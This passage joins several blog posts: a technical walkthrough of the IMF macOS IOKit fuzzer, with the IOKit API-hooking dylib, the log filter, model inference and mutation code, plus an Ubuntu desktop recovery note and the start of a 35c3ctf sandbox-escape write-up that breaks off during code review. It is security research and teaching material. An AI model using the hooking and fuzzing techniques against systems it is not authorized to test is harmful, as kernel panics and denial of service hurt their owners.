  else fprintf(fp,"{'name':'flag','value': 0x%x, 'size' : 0x%lx,'cnt':'undefined', 'data':[",flag,sizeof(uint32_t));
  fprintf(fp,"]},");
  fprintf(fp,"]\n");
  kern_return_t ret = IOCatalogueReset(masterPort,flag);
  fprintf(fp,"OUT ['IOCatalogueReset',");
  if(1) fprintf(fp,"{'name':'ret','value': 0x%x,'size' : 0x%lx,'cnt':0x%x, 'data':[",ret, sizeof(kern_return_t),1);
  else fprintf(fp,"{'name':'ret','value': 0x%x, 'size' : 0x%lx,'cnt':'undefined', 'data':[",ret,sizeof(kern_return_t));
  fprintf(fp,"]},");
  fprintf(fp,"]\n");
  fclose(fp);
  return ret;
}
[...]

typedef struct interposer {
    void* replacement;
    void* original;
} interpose_t;
__attribute__((used)) static const interpose_t interposers[]
  __attribute__((section("__DATA, __interpose"))) = {
    { 
        .replacement = (void*) fake_IOCatalogueReset, 
        .original    = (void*) IOCatalogueReset
    },
    [...]
  };

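hook.py generates the fake_IOXXXX functions in bulk and fills the interposers array with the corresponding entries.

Once the hook.py hook.c command has finished and produced hook.c, build the dylib to be injected with:

clang -Wall -dynamiclib -framework IOKit -framework CoreFoundation -arch x86_64 hook.c -o hook.dylib

Then run the target program with the library injected:

DYLD_INSERT_LIBRARIES=${PWD}/hook.dylib [program path] [program args]

Whenever the target program calls into the IOKit library, the injected hook.dylib intercepts the corresponding IOKit functions and appends a record to /tmp/log: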

# kern_return_t IORegistryEntryGetLocationInPlane(
# io_registry_entry_t entry,
#   const io_name_t   plane,
# io_name_t           location );

IN 
[
  'IORegistryEntryGetLocationInPlane',
  {
    'name':'entry',   # argument 1: parameter name
    'value': 0x2607,  # argument 1: value passed at call time
    'size' : 0x4,     # argument 1: size in memory, i.e. sizeof(type)
        'cnt':0x1,    # argument 1: if a pointer, the number of elements it points to
        'ori':'IOServiceGetMatchingService(
          0,IOServiceMatching(
            "IOUserServer(com.apple.driverkit.AppleUserHIDDrivers-0x100000419)"))', 
        'data':[]     # argument 1: if a pointer, every element of the pointed-to array
  },
  {
    'name':'plane',
    'value': '"IOService"',
    'size' : 0x80,
    'cnt':0x1, 
    'data':[]
  },
  {
    'name':'location',
    'value': '"x&"',
    'size' : 0x80,
    'cnt':0x1, 
    'data':[]
  },
]

OUT 
[
  'IORegistryEntryGetLocationInPlane',
  {
    'name':'ret',
    'value': 0xe00002f0,
    'size' : 0x4,
    'cnt':0x1, 
    'data':[]
  },
]

Note that API Hook emits two entries for every IOKit function call:

An IN entry, which records the arguments passed in
An OUT entry, which records what the call returned
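
Because each entry is written as a Python-style list literal, the IN/OUT pairing can be sketched in a few lines. This is only an illustration, not IMF's own loader: the helper names parse_entry and pair_calls are hypothetical, and the sketch assumes one entry per line, as in the raw log.

```python
import ast

def parse_entry(line):
    """Split one log line into (direction, function name, argument records)."""
    direction, _, payload = line.partition(" ")
    # The payload is a list literal (hex ints, trailing commas), so
    # ast.literal_eval can read it without executing arbitrary code.
    fields = ast.literal_eval(payload)
    return direction, fields[0], fields[1:]

def pair_calls(lines):
    """Group consecutive IN/OUT entries into one record per API call."""
    calls = []
    for in_line, out_line in zip(lines[0::2], lines[1::2]):
        d_in, name_in, args = parse_entry(in_line)
        d_out, name_out, rets = parse_entry(out_line)
        if (d_in, d_out) != ("IN", "OUT") or name_in != name_out:
            raise ValueError("unpaired log entries")
        calls.append({"name": name_in, "args": args, "ret": rets})
    return calls

sample = [
    "IN ['IORegistryGetRootEntry',{'name':'masterPort','value': 0x0,'size' : 0x4,'cnt':0x1, 'data':[]},]",
    "OUT ['IORegistryGetRootEntry',{'name':'ret','value': 0x2903,'size' : 0x4,'cnt':0x1, 'data':[]},]",
]
calls = pair_calls(sample)
```

Each element of calls then carries the function name, the input argument records and the return record of one IOKit call.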

2. Inferrer

a. Log Filtering

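1) Paper details

Running the target program in different environments produces different logs, so IMF filters and post-processes the collected logs.

The goal of Log Filtering is to pick, from the given set of logs, the N logs that share the longest common prefix, and to keep only that common prefix. The result is a set of call sequences S that contain the same API calls, in the same order and in the same number.

Because the sequences in S were recorded in different environments, some arguments take different values across logs. This variation is what lets IMF infer the API model more accurately.

2) Implementation details

Filtering is implemented in filter.py.

The filter first reads every log file and hashes each IN/OUT entry pair in it.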

def loader(path):
    ret = []
    with open(path, 'rb') as f:
        data = f.read().split('\n')[:-1]
    idx = 0
    while idx < len(data):
        name = parse_name(data[idx])
        selector = parse_selector(data[idx])
        hval = merge(name, selector)
        ret.append(hval)
        idx += 2
    return path, ret

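Each entry is hashed from the function name plus the selector (the merge operation). The selector is only used when the function belongs to the IOConnectCallXXXXMethod family, so calls to the same CallMethod function with different selectors hash to different values.

The result is a list of tuples. Each tuple has two members: the name of a log file, and a list holding the hash of every entry in that file: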

[
    'log1.txt', [
        entry1_hash,
        entry2_hash,
        ....
    ],
    ....
]

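The output of the previous step is called a group. The filter then runs categorize, which looks at the entry hash stored at a given index in every log of every group. This is how the longest common prefix is narrowed down.

After each pass, log files that have different hashes at the same idx are split apart and placed into separate new groups.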

def categorize(groups, idx):
    ret = []
    for group in groups:
        tmp = {}
        for fn, hvals in group:
            hval = get(hvals, idx)
            if hval not in tmp:
                tmp[hval] = []
            tmp[hval].append((fn, hvals))
        for hval in tmp:
            if hval != None :
                ret.append(tmp[hval])
    return ret

After each pass produces the new groups, find_best calls pick_best, which scans the groups for one that still contains at least N log files.

def find_best(groups, n):
    before = None
    idx = 0
    while len(groups) != 0:
        before = groups
        groups = categorize(groups, idx)
        if pick_best(groups, n) == None:
            return pick_best(before, n), idx
        idx += 1
    utils.error('find_best error')

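If such a group exists, the filtering is not yet exhausted, so idx is incremented and the loop continues. Otherwise find_best falls back to the previous set of groups, picks a group with at least N log files from it, and returns it together with the idx reached so far. (Note that a single group contains multiple log files.)

In this way the filter selects several log files and saves the first idx calls of each, which form their common prefix.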

def save_best(path, best_group, idx):
    for fn, _ in best_group:
        name = fn.split('/')[-1]
        with open(fn, 'rb') as f:
            data = f.read().split('\n')[:-1]
        with open(os.path.join(path, name), 'wb') as f:
            for x in data[:idx*2]:
                f.write(x+'\n')
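
The whole selection can be condensed into a short sketch. This is a simplified restatement, not the code in filter.py: the function names are hypothetical, logs are given as a dict from file name to list of hashes, and groups smaller than n are dropped after every split instead of being carried along.

```python
from collections import defaultdict

def split_by_index(groups, idx):
    """Split each group by the hash at position idx; logs that are too short drop out."""
    result = []
    for group in groups:
        buckets = defaultdict(list)
        for name, hashes in group:
            if idx < len(hashes):
                buckets[hashes[idx]].append((name, hashes))
        result.extend(buckets.values())
    return result

def longest_common_prefix_group(logs, n):
    """Return (group, prefix_len) for at least n logs sharing the longest common prefix."""
    if len(logs) < n:
        return [], 0
    groups = [list(logs.items())]
    idx = 0
    while True:
        candidates = [g for g in split_by_index(groups, idx) if len(g) >= n]
        if not candidates:
            # No group of size >= n agrees on position idx: the prefix ends here.
            return max(groups, key=len), idx
        groups = candidates
        idx += 1

logs = {"a": [1, 2, 3, 4], "b": [1, 2, 3, 5], "c": [1, 2, 9], "d": [7]}
best, prefix_len = longest_common_prefix_group(logs, 2)
```

With n = 2, logs a and b survive every split up to index 3, so the first three calls of each would be saved.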

b. API Model Inference

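1) Paper details

The paper does nothing special about ordering dependencies between API calls. It optimistically assumes that the calls should simply follow the order observed in the filtered call sequences S.

For data dependencies, the paper splits detection into two steps:

Identify all constants
Identify the data flow between pairs of functions

Constants come first. For a given call in a sequence, a constant argument must have the same value in every other filtered call sequence (the N sequences kept by the filter). For example: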

// Sequence 1
[...]
/* i-th call */ A(var1, 12);
[...]

// Sequence 2
[...]
/* i-th call */ A(var2, 12);
[...]

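The second argument of the i-th call is 12 in every sequence, so the second argument of A can be treated as a constant.

Formally, let $S^k_{i,j}$ be the $i$-th argument of the $j$-th function call in the $k$-th call sequence. If $S^1_{i,j}=S^2_{i,j}=\dots=S^N_{i,j}$, then $S_{i,j}$ is a constant argument.

Handle types must be ignored during constant identification: even when a handle has the same value across logs, it is still not a constant.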
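
A minimal sketch of this rule, assuming each call sequence is reduced to a list of argument tuples. The function name find_constants and the handle_args parameter (positions known to hold handles) are hypothetical and only serve the illustration.

```python
def find_constants(sequences, handle_args=frozenset()):
    """sequences[k][j] is the argument tuple of the j-th call in the k-th log.

    Returns the set of (j, i) positions whose value is identical in every log.
    """
    constants = set()
    for j, args in enumerate(sequences[0]):
        for i, value in enumerate(args):
            if (j, i) in handle_args:
                continue  # handles are never treated as constants
            if all(seq[j][i] == value for seq in sequences[1:]):
                constants.add((j, i))
    return constants

seq1 = [(0x10, 12)]  # A(var1, 12)
seq2 = [(0x20, 12)]  # A(var2, 12)
consts = find_constants([seq1, seq2])
```

Note that with a single log every argument would look constant, which is one reason the filter insists on N logs.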

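Data flow identification comes next. Unlike syzkaller, IMF does not track data flowing from one argument to another. It only recognizes the simple pattern "return value of function 1 -> argument of function 2":

If any function called before a given call site returned a value equal to one of that call's input arguments, a data flow dependency is assumed.
If several earlier functions returned that same value, the most recent one is always chosen.

To improve precision, IMF takes the intersection of the data flow dependencies found for each function across all call sequences.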
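
The two rules and the intersection step can be sketched as follows. This is an illustration under simplifying assumptions, not IMF's implementation: each call is reduced to (args, ret) with hashable values, and the names infer_dataflow and common_dataflow are hypothetical.

```python
def infer_dataflow(calls):
    """calls: list of (args, ret) in call order. Returns {(j, i): producer index}."""
    flows = {}
    last_producer = {}  # return value -> index of the most recent call that returned it
    for j, (args, ret) in enumerate(calls):
        for i, value in enumerate(args):
            if value in last_producer:
                flows[(j, i)] = last_producer[value]
        last_producer[ret] = j
    return flows

def common_dataflow(sequences):
    """Keep only the dependencies observed in every sequence (set intersection)."""
    per_seq = [set(infer_dataflow(seq).items()) for seq in sequences]
    return dict(set.intersection(*per_seq))

seq1 = [((0,), 0x2903), ((0x2903, 7), 0)]
seq2 = [((0,), 0x2A07), ((0x2A07, 7), 0)]
seq3 = [((0,), 7), ((7, 7), 0)]  # the second argument matches only by coincidence
flows = common_dataflow([seq1, seq2, seq3])
```

In seq3 the literal 7 happens to equal an earlier return value, but the intersection discards that spurious edge because the other logs do not show it.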

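The final output of the inferrer is a C code fragment, represented as an AST. The inferrer emits a series of function call statements that follow the ordering dependencies, and fills in each argument according to its kind:

Constant argument: use the constant value from the call sequences
Non-constant argument
- If it has a data dependency on another function, declare a variable that connects the input argument to the function it depends on
- If it has no data dependency, pick at random one of the values this argument took in the logs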

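2) Implementation details

When the inferrer starts, it instantiates the ApiFuzz class, whose constructor calls const.load_apis to read the prepared IOKit API prototype definitions into memory and store each one as an Api object. A single Api object looks like this: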

/* 
Taking this prototype as an example:
[('kern_return_t', 'IOMasterPort'), 
[('mach_port_t', 'bootstrapPort', {}), ('mach_port_t *', 'masterPort', {'IO': 'O'})]]
*/ 
IOMasterPort_Api_class = {
    rtype: 'kern_return_t',
    rval: Arg_class {
        type: 'kern_return_t',
        name: 'ret',
        opt: {}
    },
    name: 'IOMasterPort',
    args: [
        Arg {
            type: 'mach_port_t',
            name: 'bootstrapPort',
            opt: {}
        },
        Arg {
            type: 'mach_port_t *',
            name: 'masterPort',
            opt: {'IO': 'O'}
        }
    ]
}

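Next, ApiFuzz.make_model runs the load_apilog method in multiple processes to read the API logs produced by the hook into memory.

Every two entries in an API log (one IN/OUT pair) correspond to the input arguments and the return of a single IOKit call, so load_apilog also reads the log one pair at a time, each pair into an ApiLog object. An ApiLog looks like this: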

/*
  io_registry_entry_t IORegistryGetRootEntry (mach_port_t masterPort)
  IN ['IORegistryGetRootEntry',{'name':'masterPort','value': 0x0,'size' : 0x4,'cnt':0x1, 'data':[]},]
  OUT ['IORegistryGetRootEntry',{'name':'ret','value': 0x2903,'size' : 0x4,'cnt':0x1, 'data':[]},]
*/
ApiLog (derived from Api) = {
    // The following four fields come from the Api class
    args:  xxxxx,
    name:  'IORegistryGetRootEntry',
    rtype: xxxxx,
    rval:  xxxxx,

    api: Api(IORegistryGetRootEntry),
    args_dict: {
        'masterPort': Arg(IORegistryGetRootEntry_arg0)
    },
    hval: None,
    il: {
        'masterPort': ArgLog (derived from Arg) {
            // The following three fields come from the Arg class
            type: 'mach_port_t',
            name: 'masterPort',
            opt: {},

            arg: Arg(same contents as the three fields above),
            log: {'name':'masterPort','value': 0x0,'size' : 0x4,'cnt':0x1, 'data':[]},
            is_input: True,
        }
    },
    ol: {},
    rval_log: ArgLog {
        // The following three fields come from the Arg class
        type: 'io_registry_entry_t',
        name: 'ret',
        opt: {},

        arg: Arg(same contents as the three fields above),
        log: {'name':'ret','value': 0x2903,'size' : 0x4,'cnt':0x1, 'data':[]},
        is_input: False,
    }
}

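All parsed API logs are then stored in the apisets array of the ApiFuzz class, and that array is used to build a Model. Interestingly, the list of calls itself is built from a single log file (apisets[0]); the remaining logs are only consulted by check_const and add_dataflow.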

class Model:
    def __init__(self, apisets):
        self.mapis = []
        for idx in range(len(apisets[0])):
            apilog = apisets[0][idx]
            self.mapis.append(Mapi(apilog, idx))
        self.check_const(apisets)
        self.add_dataflow(apisets)

On initialization, Model converts every apilog into a Mapi structure, whose layout is somewhat similar to that of Api:

Mapi = {
    api: Api(arglog.api),
    idx: xx,
    il: {
        'masterPort': Marg (derived from Arg) {
            arg: arglog.arg,
            value: Mval {
                value: xxx,
                const: xxx,
                dataflow: xxx,
                raw: xxx,
                ori: xxx,
                ty: xxx,
                ptr: xxx,
                name: xxx,
            },
            is_in_flag: whether the data flows in,
            name: name of the arg,

            array_flag: whether this arg is a pointer to an array,
            data: the array contents, if this arg is an array,
            cnt: the array length, if this arg is an array
        }
    },
    ol: {
        .....
    }
}

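Once the conversion is done, check const runs immediately and tries to tell which values are constants. For a pointer argument it checks each element of the pointed-to array separately; for a non-pointer argument it checks the argument's value itself.

The check itself is very simple: if the j-th argument of the i-th call takes different values across the filtered API logs, it is a variable.

After check const comes add dataflow.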

def add_dataflow(self, apisets):
    for apiset in apisets:
        before = {}
        for idx in range(len(apiset)):
            apilog = apiset[idx]
            mapi =self.mapis[idx]
            mapi.add_dataflow(before, apilog)
            update_before(before, apilog, mapi, idx)

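add_dataflow starts by creating a before dictionary that records the values produced by earlier calls. For each Marg of each Mapi it appends the observed value to the raw array of its Mval, and finally calls the get_xxx_df functions to update the Mval's dataflow field, which names the source of that value.

By walking over every apilog in this way, the program assigns one-way data flow relations to some of the Mval objects, ready for the code generation step.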

3. Fuzzer

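a. Fuzz configuration

The fuzzer has the following main settings:

T : timeout
I : number of iterations
P : mutation probability
F : number of fixed bits, used during mutation
R : random seed

The open-sourced code template is shown below. Note that it has no timeout option, possibly because that part of the code was not released: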

void parse_args(int argc, char **argv){
    int opt;
    while ((opt = getopt(argc, argv, "f:s:b:r:l:")) != -1){
        switch(opt){
            case 'f':
                log_file = optarg;
                break;
            case 's':
                seed = parse_uint(optarg);
                set_seed = 1;
                break;
            case 'b':
                bitlen = parse_uint(optarg);
                break;
            case 'r':
                rate = parse_uint(optarg);
                break;
            case 'l':
                max_loop = parse_uint(optarg);
                break;
            default :
                help();
        }

    }
    if(log_file == NULL && set_seed == 0){
        help();
    }
}

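b. Mutation strategy

The mutation strategy is fairly minimal: it only mutates argument values, at the data level.

The mutation code is hard-coded in the Python files as part of the code template. Here is a small excerpt of that template: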

uint16_t mut_short(uint16_t v){
  uint16_t r ;
  if( MAYBE ){
    r= get_rand();
    if(bitlen <16){
      return v ^ (r & ((1 << (16-bitlen))-1) ); 
    }else{
      return v ^ (r & 1) ;
    }
  }
  return v;
}

uint32_t mut_int(uint32_t v){
  uint32_t r =0;
  if( MAYBE ){
    r = (r<<16) | (uint32_t) get_rand();
    r = (r<<16) | (uint32_t) get_rand();
    if(bitlen <32){
      return v ^ (r & ((1 << (32-bitlen))-1) ); 
    }else{
      return v ^ (r & 1) ;
    }

  }
  return v;
}
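
The masking logic of these templates can be restated in a few lines. This sketch is not part of IMF: the function name mutate is hypothetical, and since the definition of the MAYBE macro is not shown above, it is assumed here to fire with a probability of rate percent.

```python
import random

def mutate(value, width, bitlen, rate, rng):
    """XOR value with random low bits, leaving the top bitlen bits untouched.

    width: size of the value in bits; rate: assumed mutation probability in percent.
    """
    if rng.randrange(100) >= rate:
        return value  # not selected for mutation this time
    if bitlen < width:
        mask = (1 << (width - bitlen)) - 1
    else:
        mask = 1  # mirrors the template: at most the lowest bit flips
    return value ^ (rng.getrandbits(width) & mask)

rng = random.Random(0)
mutated = mutate(0xABCD, width=16, bitlen=8, rate=100, rng=rng)
```

With bitlen = 8 on a 16-bit value, only the low 8 bits can change, so mutated values stay close to the ones observed in the logs.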

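V. Evaluation

IMF found a considerable number of kernel panics on macOS. Most are DoS bugs, while a few look worth attempting to exploit.
How effective the fuzzing is depends on the type of target program, because different kinds of programs exercise different sets of IOKit functions.
The figure shows that the API logs produced by Game-type programs led IMF to trigger the most macOS kernel panics, yet that program type is not the one with the widest kernel coverage. This also shows that IMF depends heavily on the API logs collected from the target programs.
IMF's precision is affected by N, and it fluctuates somewhat as N changes.

VI. Limitations

IMF is built around syscall-style APIs whose parameter types are well defined. It focuses on mutating arguments in a black-box manner and has no knowledge of the valid memory range behind each argument.
IMF assumes that the specification of every system call is known, which does not suit drivers. Driver arguments are mostly passed as void*, and IMF cannot establish explicit data flow dependencies through such untyped pointers.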

Notes on Restoring the Ubuntu Graphical Interface

2022-01-17T16:00:00.000Z

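I. Background

While setting up an environment for my girlfriend, I accidentally removed python3 from her Ubuntu install. After a reboot Ubuntu could no longer reach the graphical interface, and it took me two hours to fix.

This post briefly records the steps I used to restore it.

II. Restoring the graphical interface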

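################# Try to get online #################
# The console does not bring the network up by default, so do it manually
sudo dhclient eth0
# If that fails, look up the interface name
dmesg | grep eth
# eth0 turned out to be renamed to exxx0, so retry with that name
sudo dhclient exxx0

################# Chinese support in the console #################
# Install zhcon
sudo apt-get install zhcon    
# Use UTF-8 encoding
sudo zhcon --utf8                          

################# Repair remaining dependencies #################
# Repair the remaining dependencies first; normally nothing extra needs installing here
sudo apt-get update  
sudo dpkg --configure -a 
sudo apt-get install --fix-missing

################# Reinstall the desktop #################
sudo apt-get install --reinstall ubuntu-desktop 
# The graphical interface loads automatically once installation finishes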

If that still does not work, try the following commands as well:

sudo apt-get install ubuntu-minimal ubuntu-standard ubuntu-desktop
sudo apt install nautilus-extension-gnome-terminal
sudo reboot

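III. Restoring the network connection

First, set the managed option in /etc/NetworkManager/NetworkManager.conf to true so that NetworkManager, the desktop network manager, takes over the connections.
Note that NetworkManager is the network manager used on Desktop installs, whereas /etc/network/interfaces is the mechanism used on Server installs.
The two must not be used at the same time!

[ifupdown]
managed=true

Next, back up and empty /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf, then restart the NetworkManager service.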

sudo mv /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf  /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf_orig
sudo touch /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf

sudo service network-manager restart

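ifconfig now shows the wired interface, and nmcli reports it as connected to the wired connection. Pinging 114.114.114.114 works, but no hostname can be resolved.

Click the wired network entry in the top-right corner of the Ubuntu desktop and set DNS manually to 114.114.114.114, then restart the NetworkManager service from a terminal:

sudo service network-manager restart

IV. References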

35c3ctf pillow Writeup

2022-01-07T16:00:00.000Z

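I. Introduction

pillow is a 35c3ctf challenge about escaping the sandbox through macOS bootstrap services. I worked through it to learn more about the macOS XPC and Sandbox mechanisms.
The challenge ships two custom macOS system services, and the attacker has to hijack the IPC connection between the two XPC services to escape the sandbox.
Challenge link: pillow - 35c3ctf github

II. Environment setup

On macOS:

Build (you may add the -g -O0 flags to the Makefile beforehand)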

git clone git@github.com:saelo/35c3ctf.git
cd 35c3ctf/pillow/capsd
make
cd ../shelld
make

Start the two compiled services with launchd
- First, edit the two plists under distrib/System/Library/LaunchDaemons/ and replace the Program entry in each with the path of the corresponding compiled XPC service, for example:
  [...]
  <key>Program</key>
  <string>/Users/kiprey/Desktop/CTF/35c3ctf/pillow/capsd/capsd</string>
  [...]
- Then have launchd start the two services
  sudo chown root:wheel pillow/distrib/System/Library/LaunchDaemons/*.plist
  sudo launchctl bootstrap system pillow/distrib/System/Library/LaunchDaemons/*.plist
- To stop the services, run
  sudo launchctl bootout system pillow/distrib/System/Library/LaunchDaemons/*.plist
You can view launchd's output with log show --predicate 'processID == 1' --last 1h.

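Set up the environment for running the exploit

The challenge states that the exploit runs inside a sandbox, so we reproduce that here.

First locate the sandbox profile used by the exploit, pillow/exploit/exploit.sb: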

(version 1)
(deny default)

(import "system.sb")

; TODO enter correct path here
(allow process-exec (literal (param "EXPLOIT_BIN")))
(allow process-fork)

(allow mach-lookup (global-name "net.saelo.shelld"))
(allow mach-lookup (global-name "net.saelo.capsd"))
(allow mach-lookup (global-name "net.saelo.capsd.xpc"))

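This profile only allows fork, exec of the exploit binary, and mach-lookup of the three services provided by the challenge.

Then run the exploit with:

# Note: the EXPLOIT_BIN path must be absolute
sandbox-exec -f ./exploit.sb -D EXPLOIT_BIN=/Users/kiprey/Desktop/CTF/35c3ctf/pillow/exploit/myexploit ./myexploit

Any operation that violates the sandbox profile is then denied: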

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    printf("[+] Try running /bin/ls, this operation must be denied!\n");

    char path[] = "/bin/ls";
    char arg1[] = "/";
    char * const exec_argv [] = { path, arg1, NULL };
    char * const exec_env [] = { NULL };
    execve(path, exec_argv, exec_env);
    
    perror("myexploit-execve");
    exit(EXIT_FAILURE);
}

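Result:

Restrict the flag's permissions so that ordinary users cannot read it (optional). This is just a quick test and has no real significance.

sudo chown root:wheel ./flag
sudo chmod 640 ./flag

Note, however, that daemons started by launchd can still read this privileged flag.

The following code verifies this: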

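FILE* flag = fopen("/Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag", "r");
char buf[100] = {0};
// Read at most sizeof(buf) - 1 bytes so the zero-initialized buffer stays NUL-terminated
size_t len = flag ? fread(buf, 1, sizeof(buf) - 1, flag) : 0;
os_log(OS_LOG_DEFAULT, "flag read len: %zu, flag: [%{public}s]", len, buf);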

Log output:

III. Code walkthrough

1. capsd

Let's start with a quick look at the MIG interface.

a. capsd.defs

The code is short:

subsystem capsd 733100;

#include 
#include 
#include 

import "../common/types.h";

type string = c_string[*:1024];

routine grant_capability(server: mach_port_t; ServerAuditToken token: audit_token_t; target: audit_token_t; operation: string; arg: string);
routine has_capability(server: mach_port_t; pid: int; operation: string; arg: string; out result: int);

Only two routines are defined here, grant_capability and has_capability. A client can call them remotely, and they are executed by the implementation on the server.

b. capsd.c

1) capsd main function

capsd first logs a message to indicate that the daemon has started:

os_log(OS_LOG_DEFAULT, "net.saelo.capsd starting");

This message is not that easy to read, though. We first need to get capsd's pid from the launchd log (launchd is pid 1):

$ log show --predicate 'processID == 1' --last 1h | grep "capsd"

[...]

2022-01-05 17:00:03.199483+0800 0x7c716    Default     0x0                  1      0    launchd: [net.saelo.capsd:] This service is defined to be constantly running and is inherently inefficient.
2022-01-05 17:00:03.199525+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] internal event: WILL_SPAWN, code = 0
2022-01-05 17:00:03.199537+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] service state: spawn scheduled
2022-01-05 17:00:03.199539+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] service state: spawning
2022-01-05 17:00:03.199626+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] launching: speculative
2022-01-05 17:00:03.200004+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] xpcproxy spawned with pid 32099
2022-01-05 17:00:03.200033+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: SPAWNED, code = 0
2022-01-05 17:00:03.200035+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] service state: xpcproxy
2022-01-05 17:00:03.200138+0800 0x7c716    Default     0x0                  1      0    launchd: [system:] Bootstrap by launchctl[32098] for /Users/kiprey/Desktop/CTF/35c3ctf/pillow/distrib/System/Library/LaunchDaemons/net.saelo.capsd.plist succeeded (0: )
2022-01-05 17:00:03.200197+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: SOURCE_ATTACH, code = 0
2022-01-05 17:00:03.202699+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] service state: running
2022-01-05 17:00:03.202725+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: INIT, code = 0
2022-01-05 17:00:03.202730+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] Successfully spawned capsd[32099] because speculative

We can easily see that capsd's pid is 32099, so we run the following command to view its log:

$ log show --predicate 'processID == 32099' --last 1h

Filtering the log data using "processIdentifier == 32099"
Skipping info and debug messages, pass --info and/or --debug to include.
Timestamp                       Thread     Type        Activity             PID    TTL  
2022-01-05 17:00:03.205538+0800 0x7c8bc    Default     0x0                  32099  0    capsd: net.saelo.capsd starting
--------------------------------------------------------------------------------------------------------------------
Log      - Default:          1, Info:                0, Debug:             0, Error:          0, Fault:          0
Activity - Create:           0, Transition:          0, Actions:           0

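The output of capsd is read successfully.

Next, capsd creates an empty CFDictionary with default parameters:

capabilities_by_pid = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);

Note that this dictionary is a global variable, so it is used from other contexts as well.

After that, capsd obtains the bootstrap port and registers the reverse-DNS style name "net.saelo.capsd" with bootstrap so that other processes can use it: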

mach_port_t bootstrap_port, service_port;
task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bootstrap_port);

kr = bootstrap_check_in(bootstrap_port, "net.saelo.capsd", &service_port);
ASSERT_MACH_SUCCESS(kr, "bootstrap_check_in");

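The next step is slightly more involved. It designates capsd_server as the handler for incoming mach messages on service_port, i.e. events on service_port are dispatched to capsd_server, and then starts dispatching mach events asynchronously.

Note that MIG generates the rest of the mach message handling code, hiding the internals of Mach communication.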

dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, 0, dispatch_get_main_queue());

dispatch_source_set_event_handler(source, ^{
    dispatch_mig_server(source, MAX_MSG_SIZE, capsd_server);
});

dispatch_resume(source);

Besides the mach message server, capsd also sets up an XPC service:

// Set up XPC service
xpc_connection_t service = xpc_connection_create_mach_service("net.saelo.capsd.xpc", NULL, XPC_CONNECTION_MACH_SERVICE_LISTENER);
xpc_connection_set_target_queue(service, dispatch_get_main_queue());

xpc_connection_set_event_handler(service, ^(xpc_object_t connection) {
    if (xpc_get_type(connection) == XPC_TYPE_CONNECTION) {
        xpc_connection_set_target_queue(connection, dispatch_get_main_queue());
        xpc_connection_set_event_handler(connection, ^(xpc_object_t msg) {
            [XPC_message_event_handler]
        });
        xpc_connection_resume(connection);
    } else {
        char* description = xpc_copy_description(connection);
        os_log(OS_LOG_DEFAULT, "Received unexpected event: %{public}s\n", description);
        free(description);
    }
});
xpc_connection_resume(service);

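The XPC service handles XPC messages as shown below.

From the code we can tell that an incoming XPC message should be an xpc_dictionary with four keys: action (uint64_t), pid (int64_t), operation (string) and argument (string). The reply sent back to the caller is a dictionary with a single success key.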

if (xpc_get_type(msg) == XPC_TYPE_DICTIONARY) {
    xpc_object_t reply = xpc_dictionary_create_reply(msg);
    if (!reply)
        return;

    int action = xpc_dictionary_get_uint64(msg, "action");

    if (action == ACTION_GRANT_CAPABILITY) {
        audit_token_t creds;
        // TODO check xpc_dictionary_set_audit_token
        xpc_dictionary_get_audit_token(msg, &creds);
        pid_t target = xpc_dictionary_get_int64(msg, "pid");
        const char* operation = xpc_dictionary_get_string(msg, "operation");
        const char* argument = xpc_dictionary_get_string(msg, "argument");

        if (operation && argument) {
            xpc_dictionary_set_bool(reply, "success", grant_capability_internal(creds, target, operation, argument) == KERN_SUCCESS);
        } else {
            xpc_dictionary_set_bool(reply, "success", false);
        }
    } else if (action == ACTION_HAS_CAPABILITY) {
        pid_t target = xpc_dictionary_get_int64(msg, "pid");
        const char* operation = xpc_dictionary_get_string(msg, "operation");
        const char* argument = xpc_dictionary_get_string(msg, "argument");
        xpc_dictionary_set_bool(reply, "success", has_capability_internal(target, operation, argument));
    } else {
        xpc_dictionary_set_bool(reply, "success", false);
    }

    xpc_connection_send_message(connection, reply);
} else {
    if (xpc_get_type(msg) != XPC_TYPE_ERROR || msg != XPC_ERROR_CONNECTION_INVALID) {
        char* description = xpc_copy_description(msg);
        os_log(OS_LOG_DEFAULT, "Received unexpected event on connection: %{public}s\n", description);
        free(description);
    }
}

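The handler performs a different operation depending on the XPC request: granting a capability, or checking whether a capability is currently held.

Note the two functions the handler calls: grant_capability_internal and has_capability_internal.

2) has/grant_capability functions

has_capability and grant_capability are not called directly in capsd.c. They are the implementations of the MIG remote call interface declared earlier.

As you can see, both end up calling the *_internal functions mentioned above, so the mach server and the XPC service in capsd expose exactly the same two interfaces to clients.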

kern_return_t grant_capability(mach_port_t server, audit_token_t token, pid_t target, const char* op, const char* arg) {
    return grant_capability_internal(token, target, op, arg);
}

kern_return_t has_capability(mach_port_t server, pid_t pid, const char* op, const char* arg, int* out) {
    *out = has_capability_internal(pid, op, arg);
    return KERN_SUCCESS;
}

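3) get_or_create_capabilities_for_pid function

This is a helper for the two internal functions. Remember capabilities_by_pid, the global dictionary initialized in main? This function looks it up or adds to it.

The function is short, so here is the code first: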

CFMutableDictionaryRef get_or_create_capabilities_for_pid(pid_t pid) {
    // Check if the process exists. This is racy though...
    if (kill(pid, 0) != 0 && errno == ESRCH) {
        return NULL;
    }
    // Create a CFNumber key initialized to the given pid
